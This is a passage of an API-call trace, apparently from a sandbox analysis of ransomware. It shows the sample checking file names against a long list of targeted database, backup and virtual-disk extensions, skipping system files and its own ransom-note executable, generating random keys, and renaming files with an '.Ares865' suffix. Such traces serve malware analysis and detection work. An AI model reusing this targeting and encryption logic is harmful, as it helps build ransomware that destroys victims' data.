lstrcmpiW (lpString1="dll", lpString2="dbt") returned 1 [0088.250] lstrlenW (lpString="dbv") returned 3 [0088.250] lstrcmpiW (lpString1="dll", lpString2="dbv") returned 1 [0088.251] lstrlenW (lpString="dbx") returned 3 [0088.251] lstrcmpiW (lpString1="dll", lpString2="dbx") returned 1 [0088.251] lstrlenW (lpString="dcb") returned 3 [0088.251] lstrcmpiW (lpString1="dll", lpString2="dcb") returned 1 [0088.251] lstrlenW (lpString="dct") returned 3 [0088.251] lstrcmpiW (lpString1="dll", lpString2="dct") returned 1 [0088.251] lstrlenW (lpString="dcx") returned 3 [0088.251] lstrcmpiW (lpString1="dll", lpString2="dcx") returned 1 [0088.251] lstrlenW (lpString="ddl") returned 3 [0088.251] lstrcmpiW (lpString1="dll", lpString2="ddl") returned 1 [0088.251] lstrlenW (lpString="dlis") returned 4 [0088.251] lstrcmpiW (lpString1="_dll", lpString2="dlis") returned -1 [0088.251] lstrlenW (lpString="dp1") returned 3 [0088.251] lstrcmpiW (lpString1="dll", lpString2="dp1") returned -1 [0088.251] lstrlenW (lpString="dqy") returned 3 [0088.251] lstrcmpiW (lpString1="dll", lpString2="dqy") returned -1 [0088.251] lstrlenW (lpString="dsk") returned 3 [0088.251] lstrcmpiW (lpString1="dll", lpString2="dsk") returned -1 [0088.251] lstrlenW (lpString="dsn") returned 3 [0088.251] lstrcmpiW (lpString1="dll", lpString2="dsn") returned -1 [0088.251] lstrlenW (lpString="dtsx") returned 4 [0088.251] lstrcmpiW (lpString1="_dll", lpString2="dtsx") returned -1 [0088.251] lstrlenW (lpString="dxl") returned 3 [0088.251] lstrcmpiW (lpString1="dll", lpString2="dxl") returned -1 [0088.251] lstrlenW (lpString="eco") returned 3 [0088.251] lstrcmpiW (lpString1="dll", lpString2="eco") returned -1 [0088.251] lstrlenW (lpString="ecx") returned 3 [0088.251] lstrcmpiW (lpString1="dll", lpString2="ecx") returned -1 [0088.251] lstrlenW (lpString="edb") returned 3 [0088.251] lstrcmpiW (lpString1="dll", lpString2="edb") returned -1 [0088.251] lstrlenW (lpString="epim") returned 4 [0088.251] lstrcmpiW (lpString1="_dll", lpString2="epim") returned -1 [0088.251] lstrlenW (lpString="fcd") returned 3 [0088.251] lstrcmpiW (lpString1="dll", lpString2="fcd") returned -1 [0088.251] lstrlenW (lpString="fdb") returned 3 [0088.251] lstrcmpiW (lpString1="dll", lpString2="fdb") returned -1 [0088.251] lstrlenW (lpString="fic") returned 3 [0088.251] lstrcmpiW (lpString1="dll", lpString2="fic") returned -1 [0088.251] lstrlenW (lpString="flexolibrary") returned 12 [0088.252] lstrcmpiW (lpString1="REST.trx_dll", lpString2="flexolibrary") returned 1 [0088.252] lstrlenW (lpString="fm5") returned 3 [0088.252] lstrcmpiW (lpString1="dll", lpString2="fm5") returned -1 [0088.252] lstrlenW (lpString="fmp") returned 3 [0088.252] lstrcmpiW (lpString1="dll", lpString2="fmp") returned -1 [0088.252] lstrlenW (lpString="fmp12") returned 5 [0088.252] lstrcmpiW (lpString1="x_dll", lpString2="fmp12") returned 1 [0088.252] lstrlenW (lpString="fmpsl") returned 5 [0088.252] lstrcmpiW (lpString1="x_dll", lpString2="fmpsl") returned 1 [0088.252] lstrlenW (lpString="fol") returned 3 [0088.252] lstrcmpiW (lpString1="dll", lpString2="fol") returned -1 [0088.252] lstrlenW (lpString="fp3") returned 3 [0088.252] lstrcmpiW (lpString1="dll", lpString2="fp3") returned -1 [0088.252] lstrlenW (lpString="fp4") returned 3 [0088.252] lstrcmpiW (lpString1="dll", lpString2="fp4") returned -1 [0088.252] lstrlenW (lpString="fp5") returned 3 [0088.252] lstrcmpiW (lpString1="dll", lpString2="fp5") returned -1 [0088.252] lstrlenW (lpString="fp7") returned 3 [0088.252] lstrcmpiW (lpString1="dll", lpString2="fp7") returned -1 [0088.252] lstrlenW (lpString="fpt") returned 3 [0088.252] lstrcmpiW (lpString1="dll", lpString2="fpt") returned -1 [0088.252] lstrlenW (lpString="frm") returned 3 [0088.252] lstrcmpiW (lpString1="dll", lpString2="frm") returned -1 [0088.252] lstrlenW (lpString="gdb") returned 3 [0088.252] lstrcmpiW (lpString1="dll", lpString2="gdb") returned -1 [0088.252] lstrlenW (lpString="gdb") returned 3 [0088.252] lstrcmpiW (lpString1="dll", lpString2="gdb") returned -1 [0088.252] lstrlenW (lpString="grdb") returned 4 [0088.252] lstrcmpiW (lpString1="_dll", lpString2="grdb") returned -1 [0088.252] lstrlenW (lpString="gwi") returned 3 [0088.252] lstrcmpiW (lpString1="dll", lpString2="gwi") returned -1 [0088.252] lstrlenW (lpString="hdb") returned 3 [0088.252] lstrcmpiW (lpString1="dll", lpString2="hdb") returned -1 [0088.252] lstrlenW (lpString="his") returned 3 [0088.252] lstrcmpiW (lpString1="dll", lpString2="his") returned -1 [0088.252] lstrlenW (lpString="ib") returned 2 [0088.252] lstrcmpiW (lpString1="ll", lpString2="ib") returned 1 [0088.252] lstrlenW (lpString="idb") returned 3 [0088.253] lstrcmpiW (lpString1="dll", lpString2="idb") returned -1 [0088.253] lstrlenW (lpString="ihx") returned 3 [0088.253] lstrcmpiW (lpString1="dll", lpString2="ihx") returned -1 [0088.253] lstrlenW (lpString="itdb") returned 4 [0088.253] lstrcmpiW (lpString1="_dll", lpString2="itdb") returned -1 [0088.253] lstrlenW (lpString="itw") returned 3 [0088.253] lstrcmpiW (lpString1="dll", lpString2="itw") returned -1 [0088.253] lstrlenW (lpString="jet") returned 3 [0088.253] lstrcmpiW (lpString1="dll", lpString2="jet") returned -1 [0088.253] lstrlenW (lpString="jtx") returned 3 [0088.253] lstrcmpiW (lpString1="dll", lpString2="jtx") returned -1 [0088.253] lstrlenW (lpString="kdb") returned 3 [0088.253] lstrcmpiW (lpString1="dll", lpString2="kdb") returned -1 [0088.253] lstrlenW (lpString="kexi") returned 4 [0088.253] lstrcmpiW (lpString1="_dll", lpString2="kexi") returned -1 [0088.253] lstrlenW (lpString="kexic") returned 5 [0088.253] lstrcmpiW (lpString1="x_dll", lpString2="kexic") returned 1 [0088.253] lstrlenW (lpString="kexis") returned 5 [0088.253] lstrcmpiW (lpString1="x_dll", lpString2="kexis") returned 1 [0088.253] lstrlenW (lpString="lgc") returned 3 [0088.253] lstrcmpiW (lpString1="dll", lpString2="lgc") returned -1 [0088.253] lstrlenW (lpString="lwx") returned 3 [0088.253] lstrcmpiW (lpString1="dll", lpString2="lwx") returned -1 [0088.253] lstrlenW (lpString="maf") returned 3 [0088.253] lstrcmpiW (lpString1="dll", lpString2="maf") returned -1 [0088.253] lstrlenW (lpString="maq") returned 3 [0088.253] lstrcmpiW (lpString1="dll", lpString2="maq") returned -1 [0088.253] lstrlenW (lpString="mar") returned 3 [0088.253] lstrcmpiW (lpString1="dll", lpString2="mar") returned -1 [0088.253] lstrlenW (lpString="marshal") returned 7 [0088.253] lstrcmpiW (lpString1="trx_dll", lpString2="marshal") returned 1 [0088.253] lstrlenW (lpString="mas") returned 3 [0088.253] lstrcmpiW (lpString1="dll", lpString2="mas") returned -1 [0088.253] lstrlenW (lpString="mav") returned 3 [0088.253] lstrcmpiW (lpString1="dll", lpString2="mav") returned -1 [0088.253] lstrlenW (lpString="maw") returned 3 [0088.253] lstrcmpiW (lpString1="dll", lpString2="maw") returned -1 [0088.253] lstrlenW (lpString="mdbhtml") returned 7 [0088.254] lstrcmpiW (lpString1="trx_dll", lpString2="mdbhtml") returned 1 [0088.254] lstrlenW (lpString="mdn") returned 3 [0088.254] lstrcmpiW (lpString1="dll", lpString2="mdn") returned -1 [0088.254] lstrlenW (lpString="mdt") returned 3 [0088.254] lstrcmpiW (lpString1="dll", lpString2="mdt") returned -1 [0088.254] lstrlenW (lpString="mfd") returned 3 [0088.254] lstrcmpiW (lpString1="dll", lpString2="mfd") returned -1 [0088.254] lstrlenW (lpString="mpd") returned 3 [0088.254] lstrcmpiW (lpString1="dll", lpString2="mpd") returned -1 [0088.254] lstrlenW (lpString="mrg") returned 3 [0088.254] lstrcmpiW (lpString1="dll", lpString2="mrg") returned -1 [0088.254] lstrlenW (lpString="mud") returned 3 [0088.254] lstrcmpiW (lpString1="dll", lpString2="mud") returned -1 [0088.254] lstrlenW (lpString="mwb") returned 3 [0088.254] lstrcmpiW (lpString1="dll", lpString2="mwb") returned -1 [0088.254] lstrlenW (lpString="myd") returned 3 [0088.254] lstrcmpiW (lpString1="dll", lpString2="myd") returned -1 [0088.254] lstrlenW (lpString="ndf") returned 3 [0088.254] lstrcmpiW (lpString1="dll", lpString2="ndf") returned -1 [0088.254] lstrlenW (lpString="nnt") returned 3 [0088.254] lstrcmpiW (lpString1="dll", lpString2="nnt") returned -1 [0088.254] lstrlenW (lpString="nrmlib") returned 6 [0088.254] lstrcmpiW (lpString1="rx_dll", lpString2="nrmlib") returned 1 [0088.254] lstrlenW (lpString="ns2") returned 3 [0088.254] lstrcmpiW (lpString1="dll", lpString2="ns2") returned -1 [0088.254] lstrlenW (lpString="ns3") returned 3 [0088.254] lstrcmpiW (lpString1="dll", lpString2="ns3") returned -1 [0088.254] lstrlenW (lpString="ns4") returned 3 [0088.254] lstrcmpiW (lpString1="dll", lpString2="ns4") returned -1 [0088.254] lstrlenW (lpString="nsf") returned 3 [0088.254] lstrcmpiW (lpString1="dll", lpString2="nsf") returned -1 [0088.254] lstrlenW (lpString="nv") returned 2 [0088.254] lstrcmpiW (lpString1="ll", lpString2="nv") returned -1 [0088.254] lstrlenW (lpString="nv2") returned 3 [0088.254] lstrcmpiW (lpString1="dll", lpString2="nv2") returned -1 [0088.254] lstrlenW (lpString="nwdb") returned 4 [0088.254] lstrcmpiW (lpString1="_dll", lpString2="nwdb") returned -1 [0088.254] lstrlenW (lpString="nyf") returned 3 [0088.255] lstrcmpiW (lpString1="dll", lpString2="nyf") returned -1 [0088.255] lstrlenW (lpString="odb") returned 3 [0088.255] lstrcmpiW (lpString1="dll", lpString2="odb") returned -1 [0088.255] lstrlenW (lpString="odb") returned 3 [0088.255] lstrcmpiW (lpString1="dll", lpString2="odb") returned -1 [0088.255] lstrlenW (lpString="oqy") returned 3 [0088.255] lstrcmpiW (lpString1="dll", lpString2="oqy") returned -1 [0088.255] lstrlenW (lpString="ora") returned 3 [0088.255] lstrcmpiW (lpString1="dll", lpString2="ora") returned -1 [0088.255] lstrlenW (lpString="orx") returned 3 [0088.255] lstrcmpiW (lpString1="dll", lpString2="orx") returned -1 [0088.255] lstrlenW (lpString="owc") returned 3 [0088.255] lstrcmpiW (lpString1="dll", lpString2="owc") returned -1 [0088.255] lstrlenW (lpString="p96") returned 3 [0088.255] lstrcmpiW (lpString1="dll", lpString2="p96") returned -1 [0088.255] lstrlenW (lpString="p97") returned 3 [0088.255] lstrcmpiW (lpString1="dll", lpString2="p97") returned -1 [0088.255] lstrlenW (lpString="pan") returned 3 [0088.255] lstrcmpiW (lpString1="dll", lpString2="pan") returned -1 [0088.255] lstrlenW (lpString="pdb") returned 3 [0088.255] lstrcmpiW (lpString1="dll", lpString2="pdb") returned -1 [0088.255] lstrlenW (lpString="pdm") returned 3 [0088.255] lstrcmpiW (lpString1="dll", lpString2="pdm") returned -1 [0088.255] lstrlenW (lpString="pnz") returned 3 [0088.255] lstrcmpiW (lpString1="dll", lpString2="pnz") returned -1 [0088.255] lstrlenW (lpString="qry") returned 3 [0088.255] lstrcmpiW (lpString1="dll", lpString2="qry") returned -1 [0088.255] lstrlenW (lpString="qvd") returned 3 [0088.255] lstrcmpiW (lpString1="dll", lpString2="qvd") returned -1 [0088.255] lstrlenW (lpString="rbf") returned 3 [0088.255] lstrcmpiW (lpString1="dll", lpString2="rbf") returned -1 [0088.255] lstrlenW (lpString="rctd") returned 4 [0088.255] lstrcmpiW (lpString1="_dll", lpString2="rctd") returned -1 [0088.255] lstrlenW (lpString="rod") returned 3 [0088.255] lstrcmpiW (lpString1="dll", lpString2="rod") returned -1 [0088.255] lstrlenW (lpString="rodx") returned 4 [0088.255] lstrcmpiW (lpString1="_dll", lpString2="rodx") returned -1 [0088.255] lstrlenW (lpString="rpd") returned 3 [0088.255] lstrcmpiW (lpString1="dll", lpString2="rpd") returned -1 [0088.256] lstrlenW (lpString="rsd") returned 3 [0088.256] lstrcmpiW (lpString1="dll", lpString2="rsd") returned -1 [0088.256] lstrlenW (lpString="sas7bdat") returned 8 [0088.256] lstrcmpiW (lpString1=".trx_dll", lpString2="sas7bdat") returned -1 [0088.256] lstrlenW (lpString="sbf") returned 3 [0088.256] lstrcmpiW (lpString1="dll", lpString2="sbf") returned -1 [0088.256] lstrlenW (lpString="scx") returned 3 [0088.256] lstrcmpiW (lpString1="dll", lpString2="scx") returned -1 [0088.256] lstrlenW (lpString="sdb") returned 3 [0088.256] lstrcmpiW (lpString1="dll", lpString2="sdb") returned -1 [0088.256] lstrlenW (lpString="sdc") returned 3 [0088.256] lstrcmpiW (lpString1="dll", lpString2="sdc") returned -1 [0088.256] lstrlenW (lpString="sdf") returned 3 [0088.256] lstrcmpiW (lpString1="dll", lpString2="sdf") returned -1 [0088.256] lstrlenW (lpString="sis") returned 3 [0088.256] lstrcmpiW (lpString1="dll", lpString2="sis") returned -1 [0088.256] lstrlenW (lpString="spq") returned 3 [0088.256] lstrcmpiW (lpString1="dll", lpString2="spq") returned -1 [0088.256] lstrlenW (lpString="te") returned 2 [0088.256] lstrcmpiW (lpString1="ll", lpString2="te") returned -1 [0088.256] lstrlenW (lpString="teacher") returned 7 [0088.256] lstrcmpiW (lpString1="trx_dll", lpString2="teacher") returned 1 [0088.256] lstrlenW (lpString="tmd") returned 3 [0088.256] lstrcmpiW (lpString1="dll", lpString2="tmd") returned -1 [0088.256] lstrlenW (lpString="tps") returned 3 [0088.256] lstrcmpiW (lpString1="dll", lpString2="tps") returned -1 [0088.256] lstrlenW (lpString="trc") returned 3 [0088.256] lstrcmpiW (lpString1="dll", lpString2="trc") returned -1 [0088.256] lstrlenW (lpString="trc") returned 3 [0088.256] lstrcmpiW (lpString1="dll", lpString2="trc") returned -1 [0088.256] lstrlenW (lpString="trm") returned 3 [0088.256] lstrcmpiW (lpString1="dll", lpString2="trm") returned -1 [0088.256] lstrlenW (lpString="udb") returned 3 [0088.256] lstrcmpiW (lpString1="dll", lpString2="udb") returned -1 [0088.256] lstrlenW (lpString="udl") returned 3 [0088.256] lstrcmpiW (lpString1="dll", lpString2="udl") returned -1 [0088.256] lstrlenW (lpString="usr") returned 3 [0088.256] lstrcmpiW (lpString1="dll", lpString2="usr") returned -1 [0088.257] lstrlenW (lpString="v12") returned 3 [0088.257] lstrcmpiW (lpString1="dll", lpString2="v12") returned -1 [0088.257] lstrlenW (lpString="vis") returned 3 [0088.257] lstrcmpiW (lpString1="dll", lpString2="vis") returned -1 [0088.257] lstrlenW (lpString="vpd") returned 3 [0088.257] lstrcmpiW (lpString1="dll", lpString2="vpd") returned -1 [0088.257] lstrlenW (lpString="vvv") returned 3 [0088.257] lstrcmpiW (lpString1="dll", lpString2="vvv") returned -1 [0088.257] lstrlenW (lpString="wdb") returned 3 [0088.257] lstrcmpiW (lpString1="dll", lpString2="wdb") returned -1 [0088.257] lstrlenW (lpString="wmdb") returned 4 [0088.257] lstrcmpiW (lpString1="_dll", lpString2="wmdb") returned -1 [0088.257] lstrlenW (lpString="wrk") returned 3 [0088.257] lstrcmpiW (lpString1="dll", lpString2="wrk") returned -1 [0088.257] lstrlenW (lpString="xdb") returned 3 [0088.257] lstrcmpiW (lpString1="dll", lpString2="xdb") returned -1 [0088.257] lstrlenW (lpString="xld") returned 3 [0088.257] lstrcmpiW (lpString1="dll", lpString2="xld") returned -1 [0088.257] lstrlenW (lpString="xmlff") returned 5 [0088.257] lstrcmpiW (lpString1="x_dll", lpString2="xmlff") returned -1 [0088.257] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\PUB6INTL.REST.trx_dll.Ares865") returned 81 [0088.257] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\PUB6INTL.REST.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\pub6intl.rest.trx_dll"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\PUB6INTL.REST.trx_dll.Ares865" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\pub6intl.rest.trx_dll.ares865"), dwFlags=0x1) returned 1 [0088.258] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\PUB6INTL.REST.trx_dll.Ares865" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\pub6intl.rest.trx_dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0088.258] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=581984) returned 1 [0088.258] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0088.259] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0088.259] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0088.259] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0088.259] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0088.259] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0088.260] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x8e460, lpName=0x0) returned 0x15c [0088.261] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x8e460) returned 0x420000 [0088.287] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0088.288] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0088.288] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0088.288] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0088.288] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0088.288] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0088.288] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0088.288] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0088.288] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0088.288] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0088.289] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0088.289] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0088.289] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0088.289] UnmapViewOfFile (lpBaseAddress=0x420000) returned 1 [0088.296] CloseHandle (hObject=0x15c) returned 1 [0088.296] CloseHandle (hObject=0x118) returned 1 [0088.296] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0088.296] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0088.296] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0088.298] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x749d2200, ftCreationTime.dwHighDateTime=0x1cac80f, ftLastAccessTime.dwLowDateTime=0xef0320d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x749d2200, ftLastWriteTime.dwHighDateTime=0x1cac80f, nFileSizeHigh=0x0, nFileSizeLow=0x5ab60, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PUBWZINT.REST.trx_dll", cAlternateFileName="PUBWZI~1.TRX")) returned 1 [0088.298] lstrcmpiW (lpString1="PUBWZINT.REST.trx_dll", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0088.298] lstrcmpiW (lpString1="PUBWZINT.REST.trx_dll", lpString2="aoldtz.exe") returned 1 [0088.299] lstrcmpiW (lpString1="PUBWZINT.REST.trx_dll", lpString2=".") returned 1 [0088.299] lstrcmpiW (lpString1="PUBWZINT.REST.trx_dll", lpString2="..") returned 1 [0088.299] lstrcmpiW (lpString1="PUBWZINT.REST.trx_dll", lpString2="windows") returned -1 [0088.299] lstrcmpiW (lpString1="PUBWZINT.REST.trx_dll", lpString2="bootmgr") returned 1 [0088.299] lstrcmpiW (lpString1="PUBWZINT.REST.trx_dll", lpString2="temp") returned -1 [0088.299] lstrcmpiW (lpString1="PUBWZINT.REST.trx_dll", lpString2="pagefile.sys") returned 1 [0088.299] lstrcmpiW (lpString1="PUBWZINT.REST.trx_dll", lpString2="boot") returned 1 [0088.299] lstrcmpiW (lpString1="PUBWZINT.REST.trx_dll", lpString2="ids.txt") returned 1 [0088.299] lstrcmpiW (lpString1="PUBWZINT.REST.trx_dll", lpString2="ntuser.dat") returned 1 [0088.299] lstrcmpiW (lpString1="PUBWZINT.REST.trx_dll", lpString2="perflogs") returned 1 [0088.299] lstrcmpiW (lpString1="PUBWZINT.REST.trx_dll", lpString2="MSBuild") returned 1 [0088.299] lstrlenW (lpString="PUBWZINT.REST.trx_dll") returned 21 [0088.299] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\PUB6INTL.REST.trx_dll") returned 73 [0088.299] lstrcpyW (in: lpString1=0x2cce468, lpString2="PUBWZINT.REST.trx_dll" | out: lpString1="PUBWZINT.REST.trx_dll") returned="PUBWZINT.REST.trx_dll" [0088.299] lstrlenW (lpString="PUBWZINT.REST.trx_dll") returned 21 [0088.299] lstrlenW (lpString="Ares865") returned 7 [0088.299] lstrcmpiW (lpString1="trx_dll", lpString2="Ares865") returned 1 [0088.299] lstrlenW (lpString=".dll") returned 4 [0088.299] lstrcmpiW (lpString1="PUBWZINT.REST.trx_dll", lpString2=".dll") returned 1 [0088.299] lstrlenW (lpString=".lnk") returned 4 [0088.299] lstrcmpiW (lpString1="PUBWZINT.REST.trx_dll", lpString2=".lnk") returned 1 [0088.299] lstrlenW (lpString=".ini") returned 4 [0088.299] lstrcmpiW (lpString1="PUBWZINT.REST.trx_dll", lpString2=".ini") returned 1 [0088.299] lstrlenW (lpString=".sys") returned 4 [0088.299] lstrcmpiW (lpString1="PUBWZINT.REST.trx_dll", lpString2=".sys") returned 1 [0088.299] lstrlenW (lpString="PUBWZINT.REST.trx_dll") returned 21 [0088.299] lstrlenW (lpString="bak") returned 3 [0088.299] lstrcmpiW (lpString1="dll", lpString2="bak") returned 1 [0088.299] lstrlenW (lpString="ba_") returned 3 [0088.299] lstrcmpiW (lpString1="dll", lpString2="ba_") returned 1 [0088.299] lstrlenW (lpString="dbb") returned 3 [0088.299] lstrcmpiW (lpString1="dll", lpString2="dbb") returned 1 [0088.299] lstrlenW (lpString="vmdk") returned 4 [0088.299] lstrcmpiW (lpString1="_dll", lpString2="vmdk") returned -1 [0088.299] lstrlenW (lpString="rar") returned 3 [0088.299] lstrcmpiW (lpString1="dll", lpString2="rar") returned -1 [0088.299] lstrlenW (lpString="zip") returned 3 [0088.299] lstrcmpiW (lpString1="dll", lpString2="zip") returned -1 [0088.300] lstrlenW (lpString="tgz") returned 3 [0088.300] lstrcmpiW (lpString1="dll", lpString2="tgz") returned -1 [0088.300] lstrlenW (lpString="vbox") returned 4 [0088.300] lstrcmpiW (lpString1="_dll", lpString2="vbox") returned -1 [0088.300] lstrlenW (lpString="vdi") returned 3 [0088.300] lstrcmpiW (lpString1="dll", lpString2="vdi") returned -1 [0088.300] lstrlenW (lpString="vhd") returned 3 [0088.300] lstrcmpiW (lpString1="dll", lpString2="vhd") returned -1 [0088.300] lstrlenW (lpString="vhdx") returned 4 [0088.300] lstrcmpiW (lpString1="_dll", lpString2="vhdx") returned -1 [0088.300] lstrlenW (lpString="avhd") returned 4 [0088.300] lstrcmpiW (lpString1="_dll", lpString2="avhd") returned -1 [0088.300] lstrlenW (lpString="db") returned 2 [0088.300] lstrcmpiW (lpString1="ll", lpString2="db") returned 1 [0088.300] lstrlenW (lpString="db2") returned 3 [0088.300] lstrcmpiW (lpString1="dll", lpString2="db2") returned 1 [0088.300] lstrlenW (lpString="db3") returned 3 [0088.300] lstrcmpiW (lpString1="dll", lpString2="db3") returned 1 [0088.300] lstrlenW (lpString="dbf") returned 3 [0088.300] lstrcmpiW (lpString1="dll", lpString2="dbf") returned 1 [0088.300] lstrlenW (lpString="mdf") returned 3 [0088.300] lstrcmpiW (lpString1="dll", lpString2="mdf") returned -1 [0088.300] lstrlenW (lpString="mdb") returned 3 [0088.300] lstrcmpiW (lpString1="dll", lpString2="mdb") returned -1 [0088.300] lstrlenW (lpString="sql") returned 3 [0088.300] lstrcmpiW (lpString1="dll", lpString2="sql") returned -1 [0088.300] lstrlenW (lpString="sqlite") returned 6 [0088.300] lstrcmpiW (lpString1="rx_dll", lpString2="sqlite") returned -1 [0088.300] lstrlenW (lpString="sqlite3") returned 7 [0088.300] lstrcmpiW (lpString1="trx_dll", lpString2="sqlite3") returned 1 [0088.300] lstrlenW (lpString="sqlitedb") returned 8 [0088.300] lstrcmpiW (lpString1=".trx_dll", lpString2="sqlitedb") returned -1 [0088.300] lstrlenW (lpString="xml") returned 3 [0088.300] lstrcmpiW (lpString1="dll", lpString2="xml") returned -1 [0088.300] lstrlenW (lpString="$er") returned 3 [0088.300] lstrcmpiW (lpString1="dll", lpString2="$er") returned 1 [0088.300] lstrlenW (lpString="4dd") returned 3 [0088.300] lstrcmpiW (lpString1="dll", lpString2="4dd") returned 1 [0088.301] lstrlenW (lpString="4dl") returned 3 [0088.301] lstrcmpiW (lpString1="dll", lpString2="4dl") returned 1 [0088.301] lstrlenW (lpString="^^^") returned 3 [0088.301] lstrcmpiW (lpString1="dll", lpString2="^^^") returned 1 [0088.301] lstrlenW (lpString="abs") returned 3 [0088.301] lstrcmpiW (lpString1="dll", lpString2="abs") returned 1 [0088.301] lstrlenW (lpString="abx") returned 3 [0088.301] lstrcmpiW (lpString1="dll", lpString2="abx") returned 1 [0088.301] lstrlenW (lpString="accdb") returned 5 [0088.301] lstrcmpiW (lpString1="x_dll", lpString2="accdb") returned 1 [0088.301] lstrlenW (lpString="accdc") returned 5 [0088.301] lstrcmpiW (lpString1="x_dll", lpString2="accdc") returned 1 [0088.301] lstrlenW (lpString="accde") returned 5 [0088.301] lstrcmpiW (lpString1="x_dll", lpString2="accde") returned 1 [0088.301] lstrlenW (lpString="accdr") returned 5 [0088.301] lstrcmpiW (lpString1="x_dll", lpString2="accdr") returned 1 [0088.301] lstrlenW (lpString="accdt") returned 5 [0088.301] lstrcmpiW (lpString1="x_dll", lpString2="accdt") returned 1 [0088.301] lstrlenW (lpString="accdw") returned 5 [0088.301] lstrcmpiW (lpString1="x_dll", lpString2="accdw") returned 1 [0088.301] lstrlenW (lpString="accft") returned 5 [0088.301] lstrcmpiW (lpString1="x_dll", lpString2="accft") returned 1 [0088.301] lstrlenW (lpString="adb") returned 3 [0088.301] lstrcmpiW (lpString1="dll", lpString2="adb") returned 1 [0088.301] lstrlenW (lpString="adb") returned 3 [0088.301] lstrcmpiW (lpString1="dll", lpString2="adb") returned 1 [0088.301] lstrlenW (lpString="ade") returned 3 [0088.301] lstrcmpiW (lpString1="dll", lpString2="ade") returned 1 [0088.301] lstrlenW (lpString="adf") returned 3 [0088.301] lstrcmpiW (lpString1="dll", lpString2="adf") returned 1 [0088.301] lstrlenW (lpString="adn") returned 3 [0088.301] lstrcmpiW (lpString1="dll", lpString2="adn") returned 1 [0088.301] lstrlenW (lpString="adp") returned 3 [0088.301] lstrcmpiW (lpString1="dll", lpString2="adp") returned 1 [0088.301] lstrlenW (lpString="alf") returned 3 [0088.301] lstrcmpiW (lpString1="dll", lpString2="alf") returned 1 [0088.301] lstrlenW (lpString="ask") returned 3 [0088.301] lstrcmpiW (lpString1="dll", lpString2="ask") returned 1 [0088.302] lstrlenW (lpString="btr") returned 3 [0088.302] lstrcmpiW (lpString1="dll", lpString2="btr") returned 1 [0088.302] lstrlenW (lpString="cat") returned 3 [0088.302] lstrcmpiW (lpString1="dll", lpString2="cat") returned 1 [0088.302] lstrlenW (lpString="cdb") returned 3 [0088.302] lstrcmpiW 